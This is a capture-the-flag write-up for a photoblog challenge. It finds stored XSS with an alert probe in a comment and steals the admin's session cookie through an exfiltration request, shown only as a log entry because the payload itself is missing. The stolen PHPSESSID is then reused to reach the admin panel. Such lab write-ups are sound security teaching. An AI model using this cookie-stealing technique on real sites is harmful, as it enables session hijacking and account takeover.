A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea?
The website to pown is a photoblog where you can add comments on a cat picture.
By posting comments such as `<script>alert(123)</script>` we notice that there is an XSS vulnerability.
The admin panel is located at the address `admin.php`. Although, when we we try to access it we are redirected to `login.php`.
The XSS vulnerability can be used to get the admin's cookie in order to connect to `admin.php`.
After we posted the following comment
we got the following request in our logs.
22.214.171.124 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc=http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 "http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
The admin's `PHPSESSID` is `515386866780b5f132fc96c02b3ddb82`.
Once we changed our cookie, we can access `admin.php` and get the flag.